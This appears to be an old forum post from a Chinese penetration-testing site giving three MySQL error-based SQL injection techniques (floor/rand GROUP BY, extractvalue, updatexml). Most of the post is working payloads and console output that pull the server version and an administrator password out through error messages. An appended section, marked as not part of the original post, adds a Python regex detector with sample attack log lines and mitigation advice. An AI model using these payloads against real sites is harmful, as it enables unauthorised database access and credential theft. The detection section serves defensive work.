中国网络渗透测试联盟

Title: On the three error-based methods used in MySQL injection

Author: admin    Time: 2012-12-10 10:28
Posting some old notes of mine. When MySQL executes a statement it throws an error message, and sites built on php+mysql often display that error text right on the page, so the following three constructions can be used to pull specific data out of the error output.

Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor
The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version was successfully dumped in the error. To query other data, change the statement at the position where version() sits.
For example, if we need the administrator's username and password:
Method1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test run:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test run:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'

That's all. Thanks, foreign guys.
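As an added example that is not part of the original post, here is the defender's counterpart to the three techniques above: signature checks for the floor/rand GROUP BY, extractvalue and updatexml payload shapes, run over a few constructed access-log lines, plus a check for whether a page still echoes the 1062/1105 error text that these methods depend on. The log lines and the article.php page name are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Added example, not code from the post: signatures for the three error-based
# techniques above, matched against a URL-decoded, lowercased query string.
FLOOR_RAND = re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)")
GROUP_BY = re.compile(r"\bgroup\s+by\b")
XPATH_FUNCS = {  # extractvalue(<expr>, concat(...)) / updatexml(<expr>, concat(...), ...)
    "extractvalue": re.compile(r"\bextractvalue\s*\(\s*[^,()]+\s*,\s*concat\s*\("),
    "updatexml": re.compile(r"\bupdatexml\s*\(\s*[^,()]+\s*,\s*concat\s*\("),
}
# The error text that becomes the leak channel when echoed into the page. The
# "ERROR 1062 (23000):" prefix is CLI-only; mysql_error() returns just the message.
ERROR_LEAK = re.compile(
    r"Duplicate entry '[^']*' for key 'group_key'|XPATH syntax error: '[^']*'"
)

def classify_request(query_string):
    """Names of the error-based techniques present in one raw query string."""
    q = unquote_plus(query_string).lower()
    found = ["floor_rand_groupby"] if FLOOR_RAND.search(q) and GROUP_BY.search(q) else []
    return found + [name for name, pat in XPATH_FUNCS.items() if pat.search(q)]

def leaks_db_error(response_body):
    """True if a response body still carries one of the MySQL errors used above."""
    return ERROR_LEAK.search(response_body) is not None

def scan_log(lines):
    """Return (index, techniques) for each 'METHOD /path?qs HTTP/x' line that is flagged."""
    hits = []
    for i, line in enumerate(lines):
        path = line.split()[1]                      # "/article.php?id=..."
        found = classify_request(path.partition("?")[2])
        if found:
            hits.append((i, found))
    return hits

# Constructed sample access-log lines (not real traffic); the payloads are the
# ones shown in the post, URL-encoded the way a browser would send them.
SAMPLE_LOG = [
    "GET /article.php?id=1 HTTP/1.1",
    "GET /article.php?id=1+and+(select+1+from+(select+count(*),concat(version(),"
    "floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1",
    "GET /article.php?id=1+and+extractvalue(1,concat(0x5c,(select+pass+from+admin+limit+1))) HTTP/1.1",
    "GET /article.php?id=1+and+1=(updatexml(1,concat(0x5e24,(select+user()),0x5e24),1)) HTTP/1.1",
]
```

These are plain regex signatures, so inline comments, case tricks and alternative encodings will slip past them; treat a hit as a triage signal, not a control. The durable fix on the php+mysql side is a parameterized query for id together with display_errors=Off, so the 1062/1105 text never reaches the client in the first place.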

Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2